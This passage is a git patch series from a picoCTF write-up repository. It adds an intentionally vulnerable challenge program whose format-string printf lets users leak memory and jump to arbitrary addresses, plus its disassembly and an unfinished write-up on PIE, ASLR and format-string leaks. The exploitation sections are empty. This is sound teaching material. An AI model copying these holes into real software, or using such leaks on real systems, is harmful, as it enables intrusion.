3`>dKyi)*AYA zz<(d~-?Zt6xLyKo96n1R7P3|UFjphP;3p6^4~|;~8x@Hy9`D!6T0PZ|yMrESXjafu zbELe*Q+H^#?AbUtXRF7b^lS`x>H?mcCXdwQsc!Okn>-c#U3fc`(+lNT-}_*ZrBsSQ zDFUSklp;`yKq&&H2$UjFiopL%1ZdqDtrLSsWS$7;Q6R)*0p2U|bPgvBkZv%*T#vR` z$nf~j(;|ViE)C}lm`MM@6+MOWF?7c`jMkvxJO$H21I%yX z#yZ8iDST6e3Flsz#9=U6+jYG`vkK8b;;Ti5+C3@kXzdr(&*w;>BRhD5#E%cE;}pD+ z;_?M?VDRRU^t?ov)^YiS(En4&bR44E{~FM`ZD)aX;(YrB?iAQ5uvg%Kz+r*M1fCE$ zB5+jTm_TQJpC(uM4U4VK&6}l~j;?G{%SxMk4ZgbC`Ye~~A6i%Et84JBTW#>4RwAxt zcA4w@t=715lh&u(c{ii==XQP;`*ML3hoBi6(!&P43ytrW(g;bFDu*rgam3=X%sKgD0k60IZn*4l5*Rw*`gPT>GcIMnAumG4gK9I%=!d z&1iI-W^ovr#ondi%v9jGTLy8Pbi~agc*(k$7PuP)PvbaW7aDMps&Q%t`n<3ZFvlFLqqt;pHq~d-<*q<)K|Dg!~W)Xfa#KFBE+Jhn(U%@T@!UcQ&@6#YRJd`|HD#Ugh8`zPpLgpU`l$2z|- z6tF_r(>S?S@I%0(z1Ly?q_C$47+KhVoAW}jz|V^CXNvG+Mfg1M7$0YQt^hAt>Z5Em z+!t4nV8w7+%V=3xDHCSXn=TYBp}@9|q>B4OA}OUip6Uw4m57!~XOvL3kA+i--ngo% z5#PqT4fTbMa5G3u38mAaeg%I0PxrHE8eRq{k!&K-4=xr-0ZYwhdLSE5LX#9_%dWt- zpc35PqQHI+yIq7SEq8AZY-??{YxrgppkS|*5|l*=a?38JY;D`o6lha+Y}v9q*sin( zn%aU`D&L|K&SZIuaXSodeDV8fr^=`8N-;LV*zLoicwC8QlVL5EN@n;L8@mDDR%53W zH4@T7VndBX<=CAwt!)rnbEX+=F5jnPr)KQLv8&M|W2fNMLwk(fHn5?`c=4n3gp!fC z3j2ci<{_tteSeM;$)tn>Y}VNUMZsPoC7V&<)J;bnPd+;cTZ0s(E0YoR@x4M~7m>XZ zzLm*N+4nU~>u%+npQdGgCKcFHL>&tE8Wr3?WZ%wYFM;_o{Ru791*oMB?4ca&l2X&X z%m;6&R9|;8>+4O!%c`{2Z=t%fG1xB{iwG*v)LN^Bx*0d`31xbiFVdfcDh$-phUS2p z&Ol$X2@2@aYCMDvBG((&n2$%)2U%Zt3Pj9g)G+gDD!fDU;dKetDc;+BYLB=Qdm>O8 zNk$pQC24q29;yl@Vo;dj4rh${U^qy?C2k#8K4TuA%-~i8_k1JaxP^(3=B);6*is(x zCivhKk^DCbe?kd#)c2<$6XN?lYohxPajlTC`qO-bP$ENtPJi6*_#wA*>UAG#_`iKLmQ5i<3XiZwSXQxR9`om?eLjH^+d(LneQk2N60SkVSFeVIBM_MK~!8seb42e@pl` z2|N1zflv|$jQ$uir~fm+p$U}_4-G~V=$v^t&;Qd7e@XZej*8+49L2Ne9R4&vBqaM{ z{wEy%@UUehfg?gBpz;XuxypL{^c+Q4F0Lo1KglN@{xmNotRzE$&iMUG_|y4kk}wqb zq!0<{{E_@y$YA@)pXRxQd&y9sv;Nl{{!@}+NZ5mgTavT>i=e}~C54IRPqZ)HX-_iY zyWk76f774l*FCjBLLxgunwE*b3<~VKR6otb>HiGS{}aIL4-@&(`Trqsc!=arzxQ>D z2kB#=vnKKn%p`>~ZEzXS!`_H@0 Luvp}9aER>Rl=_X% literal 0 HcmV?d00001 diff --git a/picoctf/binary_exploit/pie_time12/pie_time2/vuln.c b/picoctf/binary_exploit/pie_time12/pie_time2/vuln.c new file mode 100644 index 0000000..51b81dd --- /dev/null +++ b/picoctf/binary_exploit/pie_time12/pie_time2/vuln.c @@ -0,0 +1,56 @@ +#include +#include +#include +#include + +void segfault_handler() { + printf("Segfault Occurred, incorrect address.\n"); + exit(0); +} + +void call_functions() { + char buffer[64]; + printf("Enter your name:"); + fgets(buffer, 64, stdin); + printf(buffer); + + unsigned long val; + printf(" enter the address to jump to, ex => 0x12345: "); + scanf("%lx", &val); + + void (*foo)(void) = (void (*)())val; + foo(); +} + +int win() { + FILE *fptr; + char c; + + printf("You won!\n"); + // Open file + fptr = fopen("flag.txt", "r"); + if (fptr == NULL) + { + printf("Cannot open file.\n"); + exit(0); + } + + // Read contents from file + c = fgetc(fptr); + while (c != EOF) + { + printf ("%c", c); + c = fgetc(fptr); + } + + printf("\n"); + fclose(fptr); +} + +int main() { + signal(SIGSEGV, segfault_handler); + setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered + + call_functions(); + return 0; +} \ No newline at end of file diff --git a/picoctf/binary_exploit/pie_time12/pie_time2/vuln_dump.txt b/picoctf/binary_exploit/pie_time12/pie_time2/vuln_dump.txt new file mode 100644 index 0000000..e046207 --- /dev/null +++ b/picoctf/binary_exploit/pie_time12/pie_time2/vuln_dump.txt @@ -0,0 +1,345 @@ + +vuln: file format elf64-x86-64 + +Disassembly of section .init: + +0000000000001000 <_init>: + 1000: f3 0f 1e fa endbr64 + 1004: 48 83 ec 08 subq $8, %rsp + 1008: 48 8b 05 d9 2f 00 00 movq 12249(%rip), %rax # 0x3fe8 <_GLOBAL_OFFSET_TABLE_+0x88> + 100f: 48 85 c0 testq %rax, %rax + 1012: 74 02 je 0x1016 <_init+0x16> + 1014: ff d0 callq *%rax + 1016: 48 83 c4 08 addq $8, %rsp + 101a: c3 retq + +Disassembly of section .plt: + +0000000000001020 <.plt>: + 1020: ff 35 42 2f 00 00 pushq 12098(%rip) # 0x3f68 <_GLOBAL_OFFSET_TABLE_+0x8> + 1026: f2 ff 25 43 2f 00 00 repne jmpq *12099(%rip) # 0x3f70 <_GLOBAL_OFFSET_TABLE_+0x10> + 102d: 0f 1f 00 nopl (%rax) + 1030: f3 0f 1e fa endbr64 + 1034: 68 00 00 00 00 pushq $0 + 1039: f2 e9 e1 ff ff ff repne jmp 0x1020 <.plt> + 103f: 90 nop + 1040: f3 0f 1e fa endbr64 + 1044: 68 01 00 00 00 pushq $1 + 1049: f2 e9 d1 ff ff ff repne jmp 0x1020 <.plt> + 104f: 90 nop + 1050: f3 0f 1e fa endbr64 + 1054: 68 02 00 00 00 pushq $2 + 1059: f2 e9 c1 ff ff ff repne jmp 0x1020 <.plt> + 105f: 90 nop + 1060: f3 0f 1e fa endbr64 + 1064: 68 03 00 00 00 pushq $3 + 1069: f2 e9 b1 ff ff ff repne jmp 0x1020 <.plt> + 106f: 90 nop + 1070: f3 0f 1e fa endbr64 + 1074: 68 04 00 00 00 pushq $4 + 1079: f2 e9 a1 ff ff ff repne jmp 0x1020 <.plt> + 107f: 90 nop + 1080: f3 0f 1e fa endbr64 + 1084: 68 05 00 00 00 pushq $5 + 1089: f2 e9 91 ff ff ff repne jmp 0x1020 <.plt> + 108f: 90 nop + 1090: f3 0f 1e fa endbr64 + 1094: 68 06 00 00 00 pushq $6 + 1099: f2 e9 81 ff ff ff repne jmp 0x1020 <.plt> + 109f: 90 nop + 10a0: f3 0f 1e fa endbr64 + 10a4: 68 07 00 00 00 pushq $7 + 10a9: f2 e9 71 ff ff ff repne jmp 0x1020 <.plt> + 10af: 90 nop + 10b0: f3 0f 1e fa endbr64 + 10b4: 68 08 00 00 00 pushq $8 + 10b9: f2 e9 61 ff ff ff repne jmp 0x1020 <.plt> + 10bf: 90 nop + 10c0: f3 0f 1e fa endbr64 + 10c4: 68 09 00 00 00 pushq $9 + 10c9: f2 e9 51 ff ff ff repne jmp 0x1020 <.plt> + 10cf: 90 nop + 10d0: f3 0f 1e fa endbr64 + 10d4: 68 0a 00 00 00 pushq $10 + 10d9: f2 e9 41 ff ff ff repne jmp 0x1020 <.plt> + 10df: 90 nop + 10e0: f3 0f 1e fa endbr64 + 10e4: 68 0b 00 00 00 pushq $11 + 10e9: f2 e9 31 ff ff ff repne jmp 0x1020 <.plt> + 10ef: 90 nop + +Disassembly of section .plt.got: + +00000000000010f0 <.plt.got>: + 10f0: f3 0f 1e fa endbr64 + 10f4: f2 ff 25 fd 2e 00 00 repne jmpq *12029(%rip) # 0x3ff8 <_GLOBAL_OFFSET_TABLE_+0x98> + 10fb: 0f 1f 44 00 00 nopl (%rax,%rax) + +Disassembly of section .plt.sec: + +0000000000001100 <.plt.sec>: + 1100: f3 0f 1e fa endbr64 + 1104: f2 ff 25 6d 2e 00 00 repne jmpq *11885(%rip) # 0x3f78 <_GLOBAL_OFFSET_TABLE_+0x18> + 110b: 0f 1f 44 00 00 nopl (%rax,%rax) + 1110: f3 0f 1e fa endbr64 + 1114: f2 ff 25 65 2e 00 00 repne jmpq *11877(%rip) # 0x3f80 <_GLOBAL_OFFSET_TABLE_+0x20> + 111b: 0f 1f 44 00 00 nopl (%rax,%rax) + 1120: f3 0f 1e fa endbr64 + 1124: f2 ff 25 5d 2e 00 00 repne jmpq *11869(%rip) # 0x3f88 <_GLOBAL_OFFSET_TABLE_+0x28> + 112b: 0f 1f 44 00 00 nopl (%rax,%rax) + 1130: f3 0f 1e fa endbr64 + 1134: f2 ff 25 55 2e 00 00 repne jmpq *11861(%rip) # 0x3f90 <_GLOBAL_OFFSET_TABLE_+0x30> + 113b: 0f 1f 44 00 00 nopl (%rax,%rax) + 1140: f3 0f 1e fa endbr64 + 1144: f2 ff 25 4d 2e 00 00 repne jmpq *11853(%rip) # 0x3f98 <_GLOBAL_OFFSET_TABLE_+0x38> + 114b: 0f 1f 44 00 00 nopl (%rax,%rax) + 1150: f3 0f 1e fa endbr64 + 1154: f2 ff 25 45 2e 00 00 repne jmpq *11845(%rip) # 0x3fa0 <_GLOBAL_OFFSET_TABLE_+0x40> + 115b: 0f 1f 44 00 00 nopl (%rax,%rax) + 1160: f3 0f 1e fa endbr64 + 1164: f2 ff 25 3d 2e 00 00 repne jmpq *11837(%rip) # 0x3fa8 <_GLOBAL_OFFSET_TABLE_+0x48> + 116b: 0f 1f 44 00 00 nopl (%rax,%rax) + 1170: f3 0f 1e fa endbr64 + 1174: f2 ff 25 35 2e 00 00 repne jmpq *11829(%rip) # 0x3fb0 <_GLOBAL_OFFSET_TABLE_+0x50> + 117b: 0f 1f 44 00 00 nopl (%rax,%rax) + 1180: f3 0f 1e fa endbr64 + 1184: f2 ff 25 2d 2e 00 00 repne jmpq *11821(%rip) # 0x3fb8 <_GLOBAL_OFFSET_TABLE_+0x58> + 118b: 0f 1f 44 00 00 nopl (%rax,%rax) + 1190: f3 0f 1e fa endbr64 + 1194: f2 ff 25 25 2e 00 00 repne jmpq *11813(%rip) # 0x3fc0 <_GLOBAL_OFFSET_TABLE_+0x60> + 119b: 0f 1f 44 00 00 nopl (%rax,%rax) + 11a0: f3 0f 1e fa endbr64 + 11a4: f2 ff 25 1d 2e 00 00 repne jmpq *11805(%rip) # 0x3fc8 <_GLOBAL_OFFSET_TABLE_+0x68> + 11ab: 0f 1f 44 00 00 nopl (%rax,%rax) + 11b0: f3 0f 1e fa endbr64 + 11b4: f2 ff 25 15 2e 00 00 repne jmpq *11797(%rip) # 0x3fd0 <_GLOBAL_OFFSET_TABLE_+0x70> + 11bb: 0f 1f 44 00 00 nopl (%rax,%rax) + +Disassembly of section .text: + +00000000000011c0 <_start>: + 11c0: f3 0f 1e fa endbr64 + 11c4: 31 ed xorl %ebp, %ebp + 11c6: 49 89 d1 movq %rdx, %r9 + 11c9: 5e popq %rsi + 11ca: 48 89 e2 movq %rsp, %rdx + 11cd: 48 83 e4 f0 andq $-16, %rsp + 11d1: 50 pushq %rax + 11d2: 54 pushq %rsp + 11d3: 4c 8d 05 e6 02 00 00 leaq 742(%rip), %r8 # 0x14c0 <__libc_csu_fini> + 11da: 48 8d 0d 6f 02 00 00 leaq 623(%rip), %rcx # 0x1450 <__libc_csu_init> + 11e1: 48 8d 3d 18 02 00 00 leaq 536(%rip), %rdi # 0x1400
+ 11e8: ff 15 f2 2d 00 00 callq *11762(%rip) # 0x3fe0 <_GLOBAL_OFFSET_TABLE_+0x80> + 11ee: f4 hlt + 11ef: 90 nop + +00000000000011f0 : + 11f0: 48 8d 3d 19 2e 00 00 leaq 11801(%rip), %rdi # 0x4010 + 11f7: 48 8d 05 12 2e 00 00 leaq 11794(%rip), %rax # 0x4010 + 11fe: 48 39 f8 cmpq %rdi, %rax + 1201: 74 15 je 0x1218 + 1203: 48 8b 05 ce 2d 00 00 movq 11726(%rip), %rax # 0x3fd8 <_GLOBAL_OFFSET_TABLE_+0x78> + 120a: 48 85 c0 testq %rax, %rax + 120d: 74 09 je 0x1218 + 120f: ff e0 jmpq *%rax + 1211: 0f 1f 80 00 00 00 00 nopl (%rax) + 1218: c3 retq + 1219: 0f 1f 80 00 00 00 00 nopl (%rax) + +0000000000001220 : + 1220: 48 8d 3d e9 2d 00 00 leaq 11753(%rip), %rdi # 0x4010 + 1227: 48 8d 35 e2 2d 00 00 leaq 11746(%rip), %rsi # 0x4010 + 122e: 48 29 fe subq %rdi, %rsi + 1231: 48 89 f0 movq %rsi, %rax + 1234: 48 c1 ee 3f shrq $63, %rsi + 1238: 48 c1 f8 03 sarq $3, %rax + 123c: 48 01 c6 addq %rax, %rsi + 123f: 48 d1 fe sarq %rsi + 1242: 74 14 je 0x1258 + 1244: 48 8b 05 a5 2d 00 00 movq 11685(%rip), %rax # 0x3ff0 <_GLOBAL_OFFSET_TABLE_+0x90> + 124b: 48 85 c0 testq %rax, %rax + 124e: 74 08 je 0x1258 + 1250: ff e0 jmpq *%rax + 1252: 66 0f 1f 44 00 00 nopw (%rax,%rax) + 1258: c3 retq + 1259: 0f 1f 80 00 00 00 00 nopl (%rax) + +0000000000001260 <__do_global_dtors_aux>: + 1260: f3 0f 1e fa endbr64 + 1264: 80 3d bd 2d 00 00 00 cmpb $0, 11709(%rip) # 0x4028 + 126b: 75 2b jne 0x1298 <__do_global_dtors_aux+0x38> + 126d: 55 pushq %rbp + 126e: 48 83 3d 82 2d 00 00 00 cmpq $0, 11650(%rip) # 0x3ff8 <_GLOBAL_OFFSET_TABLE_+0x98> + 1276: 48 89 e5 movq %rsp, %rbp + 1279: 74 0c je 0x1287 <__do_global_dtors_aux+0x27> + 127b: 48 8b 3d 86 2d 00 00 movq 11654(%rip), %rdi # 0x4008 <__dso_handle> + 1282: e8 69 fe ff ff callq 0x10f0 <.plt.got> + 1287: e8 64 ff ff ff callq 0x11f0 + 128c: c6 05 95 2d 00 00 01 movb $1, 11669(%rip) # 0x4028 + 1293: 5d popq %rbp + 1294: c3 retq + 1295: 0f 1f 00 nopl (%rax) + 1298: c3 retq + 1299: 0f 1f 80 00 00 00 00 nopl (%rax) + +00000000000012a0 : + 12a0: f3 0f 1e fa endbr64 + 12a4: e9 77 ff ff ff jmp 0x1220 + +00000000000012a9 : + 12a9: f3 0f 1e fa endbr64 + 12ad: 55 pushq %rbp + 12ae: 48 89 e5 movq %rsp, %rbp + 12b1: 48 8d 3d 50 0d 00 00 leaq 3408(%rip), %rdi # 0x2008 <_IO_stdin_used+0x8> + 12b8: e8 53 fe ff ff callq 0x1110 <.plt.sec+0x10> + 12bd: bf 00 00 00 00 movl $0, %edi + 12c2: e8 e9 fe ff ff callq 0x11b0 <.plt.sec+0xb0> + +00000000000012c7 : + 12c7: f3 0f 1e fa endbr64 + 12cb: 55 pushq %rbp + 12cc: 48 89 e5 movq %rsp, %rbp + 12cf: 48 83 ec 60 subq $96, %rsp + 12d3: 64 48 8b 04 25 28 00 00 00 movq %fs:40, %rax + 12dc: 48 89 45 f8 movq %rax, -8(%rbp) + 12e0: 31 c0 xorl %eax, %eax + 12e2: 48 8d 3d 45 0d 00 00 leaq 3397(%rip), %rdi # 0x202e <_IO_stdin_used+0x2e> + 12e9: b8 00 00 00 00 movl $0, %eax + 12ee: e8 4d fe ff ff callq 0x1140 <.plt.sec+0x40> + 12f3: 48 8b 15 26 2d 00 00 movq 11558(%rip), %rdx # 0x4020 + 12fa: 48 8d 45 b0 leaq -80(%rbp), %rax + 12fe: be 40 00 00 00 movl $64, %esi + 1303: 48 89 c7 movq %rax, %rdi + 1306: e8 55 fe ff ff callq 0x1160 <.plt.sec+0x60> + 130b: 48 8d 45 b0 leaq -80(%rbp), %rax + 130f: 48 89 c7 movq %rax, %rdi + 1312: b8 00 00 00 00 movl $0, %eax + 1317: e8 24 fe ff ff callq 0x1140 <.plt.sec+0x40> + 131c: 48 8d 3d 1d 0d 00 00 leaq 3357(%rip), %rdi # 0x2040 <_IO_stdin_used+0x40> + 1323: b8 00 00 00 00 movl $0, %eax + 1328: e8 13 fe ff ff callq 0x1140 <.plt.sec+0x40> + 132d: 48 8d 45 a0 leaq -96(%rbp), %rax + 1331: 48 89 c6 movq %rax, %rsi + 1334: 48 8d 3d 34 0d 00 00 leaq 3380(%rip), %rdi # 0x206f <_IO_stdin_used+0x6f> + 133b: b8 00 00 00 00 movl $0, %eax + 1340: e8 5b fe ff ff callq 0x11a0 <.plt.sec+0xa0> + 1345: 48 8b 45 a0 movq -96(%rbp), %rax + 1349: 48 89 45 a8 movq %rax, -88(%rbp) + 134d: 48 8b 45 a8 movq -88(%rbp), %rax + 1351: ff d0 callq *%rax + 1353: 90 nop + 1354: 48 8b 45 f8 movq -8(%rbp), %rax + 1358: 64 48 33 04 25 28 00 00 00 xorq %fs:40, %rax + 1361: 74 05 je 0x1368 + 1363: e8 c8 fd ff ff callq 0x1130 <.plt.sec+0x30> + 1368: c9 leave + 1369: c3 retq + +000000000000136a : + 136a: f3 0f 1e fa endbr64 + 136e: 55 pushq %rbp + 136f: 48 89 e5 movq %rsp, %rbp + 1372: 48 83 ec 10 subq $16, %rsp + 1376: 48 8d 3d f6 0c 00 00 leaq 3318(%rip), %rdi # 0x2073 <_IO_stdin_used+0x73> + 137d: e8 8e fd ff ff callq 0x1110 <.plt.sec+0x10> + 1382: 48 8d 35 f3 0c 00 00 leaq 3315(%rip), %rsi # 0x207c <_IO_stdin_used+0x7c> + 1389: 48 8d 3d ee 0c 00 00 leaq 3310(%rip), %rdi # 0x207e <_IO_stdin_used+0x7e> + 1390: e8 fb fd ff ff callq 0x1190 <.plt.sec+0x90> + 1395: 48 89 45 f8 movq %rax, -8(%rbp) + 1399: 48 83 7d f8 00 cmpq $0, -8(%rbp) + 139e: 75 16 jne 0x13b6 + 13a0: 48 8d 3d e0 0c 00 00 leaq 3296(%rip), %rdi # 0x2087 <_IO_stdin_used+0x87> + 13a7: e8 64 fd ff ff callq 0x1110 <.plt.sec+0x10> + 13ac: bf 00 00 00 00 movl $0, %edi + 13b1: e8 fa fd ff ff callq 0x11b0 <.plt.sec+0xb0> + 13b6: 48 8b 45 f8 movq -8(%rbp), %rax + 13ba: 48 89 c7 movq %rax, %rdi + 13bd: e8 8e fd ff ff callq 0x1150 <.plt.sec+0x50> + 13c2: 88 45 f7 movb %al, -9(%rbp) + 13c5: eb 1a jmp 0x13e1 + 13c7: 0f be 45 f7 movsbl -9(%rbp), %eax + 13cb: 89 c7 movl %eax, %edi + 13cd: e8 2e fd ff ff callq 0x1100 <.plt.sec> + 13d2: 48 8b 45 f8 movq -8(%rbp), %rax + 13d6: 48 89 c7 movq %rax, %rdi + 13d9: e8 72 fd ff ff callq 0x1150 <.plt.sec+0x50> + 13de: 88 45 f7 movb %al, -9(%rbp) + 13e1: 80 7d f7 ff cmpb $-1, -9(%rbp) + 13e5: 75 e0 jne 0x13c7 + 13e7: bf 0a 00 00 00 movl $10, %edi + 13ec: e8 0f fd ff ff callq 0x1100 <.plt.sec> + 13f1: 48 8b 45 f8 movq -8(%rbp), %rax + 13f5: 48 89 c7 movq %rax, %rdi + 13f8: e8 23 fd ff ff callq 0x1120 <.plt.sec+0x20> + 13fd: 90 nop + 13fe: c9 leave + 13ff: c3 retq + +0000000000001400
: + 1400: f3 0f 1e fa endbr64 + 1404: 55 pushq %rbp + 1405: 48 89 e5 movq %rsp, %rbp + 1408: 48 8d 35 9a fe ff ff leaq -358(%rip), %rsi # 0x12a9 + 140f: bf 0b 00 00 00 movl $11, %edi + 1414: e8 57 fd ff ff callq 0x1170 <.plt.sec+0x70> + 1419: 48 8b 05 f0 2b 00 00 movq 11248(%rip), %rax # 0x4010 + 1420: b9 00 00 00 00 movl $0, %ecx + 1425: ba 02 00 00 00 movl $2, %edx + 142a: be 00 00 00 00 movl $0, %esi + 142f: 48 89 c7 movq %rax, %rdi + 1432: e8 49 fd ff ff callq 0x1180 <.plt.sec+0x80> + 1437: b8 00 00 00 00 movl $0, %eax + 143c: e8 86 fe ff ff callq 0x12c7 + 1441: b8 00 00 00 00 movl $0, %eax + 1446: 5d popq %rbp + 1447: c3 retq + 1448: 0f 1f 84 00 00 00 00 00 nopl (%rax,%rax) + +0000000000001450 <__libc_csu_init>: + 1450: f3 0f 1e fa endbr64 + 1454: 41 57 pushq %r15 + 1456: 4c 8d 3d 03 29 00 00 leaq 10499(%rip), %r15 # 0x3d60 <__init_array_start> + 145d: 41 56 pushq %r14 + 145f: 49 89 d6 movq %rdx, %r14 + 1462: 41 55 pushq %r13 + 1464: 49 89 f5 movq %rsi, %r13 + 1467: 41 54 pushq %r12 + 1469: 41 89 fc movl %edi, %r12d + 146c: 55 pushq %rbp + 146d: 48 8d 2d f4 28 00 00 leaq 10484(%rip), %rbp # 0x3d68 <__do_global_dtors_aux_fini_array_entry> + 1474: 53 pushq %rbx + 1475: 4c 29 fd subq %r15, %rbp + 1478: 48 83 ec 08 subq $8, %rsp + 147c: e8 7f fb ff ff callq 0x1000 <_init> + 1481: 48 c1 fd 03 sarq $3, %rbp + 1485: 74 1f je 0x14a6 <__libc_csu_init+0x56> + 1487: 31 db xorl %ebx, %ebx + 1489: 0f 1f 80 00 00 00 00 nopl (%rax) + 1490: 4c 89 f2 movq %r14, %rdx + 1493: 4c 89 ee movq %r13, %rsi + 1496: 44 89 e7 movl %r12d, %edi + 1499: 41 ff 14 df callq *(%r15,%rbx,8) + 149d: 48 83 c3 01 addq $1, %rbx + 14a1: 48 39 dd cmpq %rbx, %rbp + 14a4: 75 ea jne 0x1490 <__libc_csu_init+0x40> + 14a6: 48 83 c4 08 addq $8, %rsp + 14aa: 5b popq %rbx + 14ab: 5d popq %rbp + 14ac: 41 5c popq %r12 + 14ae: 41 5d popq %r13 + 14b0: 41 5e popq %r14 + 14b2: 41 5f popq %r15 + 14b4: c3 retq + 14b5: 66 66 2e 0f 1f 84 00 00 00 00 00 nopw %cs:(%rax,%rax) + +00000000000014c0 <__libc_csu_fini>: + 14c0: f3 0f 1e fa endbr64 + 14c4: c3 retq + +Disassembly of section .fini: + +00000000000014c8 <_fini>: + 14c8: f3 0f 1e fa endbr64 + 14cc: 48 83 ec 08 subq $8, %rsp + 14d0: 48 83 c4 08 addq $8, %rsp + 14d4: c3 retq diff --git a/picoctf/binary_exploit/pie_time12/writeup.md b/picoctf/binary_exploit/pie_time12/writeup.md new file mode 100644 index 0000000..3374a29 --- /dev/null +++ b/picoctf/binary_exploit/pie_time12/writeup.md @@ -0,0 +1 @@ +filler From 7b0acc819b23cb5d13ef0356bd07dce57095f6a7 Mon Sep 17 00:00:00 2001 From: Madalina Stoicov <156598074+mmstoic@users.noreply.github.com> Date: Sun, 11 May 2025 12:36:49 -0400 Subject: [PATCH 2/9] Update writeup.md --- picoctf/binary_exploit/pie_time12/writeup.md | 140 ++++++++++++++++++- 1 file changed, 139 insertions(+), 1 deletion(-) diff --git a/picoctf/binary_exploit/pie_time12/writeup.md b/picoctf/binary_exploit/pie_time12/writeup.md index 3374a29..b7c79dd 100644 --- a/picoctf/binary_exploit/pie_time12/writeup.md +++ b/picoctf/binary_exploit/pie_time12/writeup.md @@ -1 +1,139 @@ -filler +# PicoCTF: PIE time 1 and 2 + +## Context (both levels) + +We are provided with a compiled binary and the source code for each level, as well as a complimentary server and port to connect to via netcat. We only connect via netcat when we are ready to get the flag. The executable's details for each level will be explained below. + +## Background Information: PIE executables and format string vulnerabilities + +Executables can come in different forms, notably PIE (position independent executable) and no-PIE. If we compile a PIE executable, it means that that whole chunk of code for the program can be placed anywhere in memory. This enables ASLR (address space layout randomization) which randomizes the memory address of key components of our program, like where its stack, heap, etc. begin. A no-PIE executable's code will be placed at a fixed address. That means that we cannot use ASLR. + +Below, I've provided examples of objdumped PIE and no-PIE executables. Note how the no-PIE executable starts at address 0x401000, while the PIE executable starts at 0x1000 so it's able to placed at a random memory address later. + +``` text +mms2379@spoc:~/temp/studying/linking2$ objdump -d main-no-pie + +main-no-pie: file format elf64-x86-64 + + +Disassembly of section .init: + +0000000000401000 <_init>: + 401000: f3 0f 1e fa endbr64 + 401004: 48 83 ec 08 sub $0x8,%rsp + 401008: 48 8b 05 e9 2f 00 00 mov 0x2fe9(%rip),%rax # 403ff8 <__gmon_start__@Base> + 40100f: 48 85 c0 test %rax,%rax + 401012: 74 02 je 401016 <_init+0x16> + 401014: ff d0 call *%rax + 401016: 48 83 c4 08 add $0x8,%rsp + 40101a: c3 ret +... + +``` + +```text +mms2379@spoc:~/temp/studying/linking2$ objdump -d main-dyn + +main-dyn: file format elf64-x86-64 + + +Disassembly of section .init: + +0000000000001000 <_init>: + 1000: f3 0f 1e fa endbr64 + 1004: 48 83 ec 08 sub $0x8,%rsp + 1008: 48 8b 05 d9 2f 00 00 mov 0x2fd9(%rip),%rax # 3fe8 <__gmon_start__@Base> + 100f: 48 85 c0 test %rax,%rax + 1012: 74 02 je 1016 <_init+0x16> + 1014: ff d0 call *%rax + 1016: 48 83 c4 08 add $0x8,%rsp + 101a: c3 ret + ... + +``` + +A format string vulnerability takes advantage of C's `printf(...)` to leak memory addresses. For example, if a program asks for user input and then prints that input back to the user using `printf(...)`, the user can supply a format string (`%s`, `%lx`, `%p`, etc.) so that their provided information gets printed in that form. Note that this is only possible when the `printf(...)` function **does not** already have a format string specifier. See the example below from OWASP. + +``` C +#include +void main(int argc, char **argv) +{ + // This line is safe + printf("%s\n", argv[1]); + + // This line is vulnerable + printf(argv[1]); +} +``` +`./example "Hello World %p %p %p %p %p %p"` will result in: `Hello World 000E133E 000E133E 0057F000 CCCCCCCC CCCCCCCC CCCCCCCC`. + +## Vulnerability (level 1) + +When we do `./vuln` we are prompted to enter an address. If the address is not correct, we segfault: +```text +mms2379@spoc:~/ctf/pie_time$ ./vuln +Address of main: 0x58e94163433d +Enter the address to jump to, ex => 0x12345: 0x0 +Your input: 0 +Segfault Occurred, incorrect address. +``` +Note that we are given the address of the `main` function. We may take a closer look at the source code. We see that we have a `main()` function and a `win` function that is not called anywhere in the program. We also see that `win` will give us our flag. Full source code can be found in `pie_time1/vuln.c`. +```C +int win() { + FILE *fptr; + char c; + + printf("You won!\n"); + // Open file + fptr = fopen("flag.txt", "r"); + if (fptr == NULL) + { + printf("Cannot open file.\n"); + exit(0); + } + + // Read contents from file + c = fgetc(fptr); + while (c != EOF) + { + printf ("%c", c); + c = fgetc(fptr); + } + + printf("\n"); + fclose(fptr); +} + +int main() { + signal(SIGSEGV, segfault_handler); + setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered + ... +``` +Therefore, we conclude that we must somehow call the `win` function in order to get our flag. If this were a no-PIE exectuable, then we could just enter the address of the `win` function. Unfortunatley, `vuln` is a PIE executable: + +``` +mms2379@spoc:~/ctf/pie_time$ file vuln +vuln: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=0072413e1b5a0613219f45518ded05fc685b680a, for GNU/Linux 3.2.0, not stripped +``` + + + +## Exploitation (level 1) + + + +## Vulnerability (level 2) + + +## Exploitation (level 2) + + +## Remediation + + + +# Sources/Credits + +Written by Madalina Stoicov + +- https://owasp.org/www-community/attacks/Format_string_attack From 9e3d62edb5c11b346ea25d5e2742e0d770f6a5a8 Mon Sep 17 00:00:00 2001 From: Madalina Date: Sun, 11 May 2025 20:40:02 -0400 Subject: [PATCH 3/9] Split into two directories --- .../{pie_time12 => }/pie_time1/vuln | Bin .../{pie_time12 => }/pie_time1/vuln.c | 0 .../{pie_time12 => }/pie_time1/vuln_dump.txt | 2 + .../{pie_time12 => pie_time1}/writeup.md | 0 .../{pie_time12 => }/pie_time2/vuln | Bin .../{pie_time12 => }/pie_time2/vuln.c | 0 .../{pie_time12 => }/pie_time2/vuln_dump.txt | 3 + picoctf/binary_exploit/pie_time2/writeup.md | 139 ++++++++++++++++++ 8 files changed, 144 insertions(+) rename picoctf/binary_exploit/{pie_time12 => }/pie_time1/vuln (100%) rename picoctf/binary_exploit/{pie_time12 => }/pie_time1/vuln.c (100%) rename picoctf/binary_exploit/{pie_time12 => }/pie_time1/vuln_dump.txt (99%) rename picoctf/binary_exploit/{pie_time12 => pie_time1}/writeup.md (100%) rename picoctf/binary_exploit/{pie_time12 => }/pie_time2/vuln (100%) rename picoctf/binary_exploit/{pie_time12 => }/pie_time2/vuln.c (100%) rename picoctf/binary_exploit/{pie_time12 => }/pie_time2/vuln_dump.txt (99%) create mode 100644 picoctf/binary_exploit/pie_time2/writeup.md diff --git a/picoctf/binary_exploit/pie_time12/pie_time1/vuln b/picoctf/binary_exploit/pie_time1/vuln similarity index 100% rename from picoctf/binary_exploit/pie_time12/pie_time1/vuln rename to picoctf/binary_exploit/pie_time1/vuln diff --git a/picoctf/binary_exploit/pie_time12/pie_time1/vuln.c b/picoctf/binary_exploit/pie_time1/vuln.c similarity index 100% rename from picoctf/binary_exploit/pie_time12/pie_time1/vuln.c rename to picoctf/binary_exploit/pie_time1/vuln.c diff --git 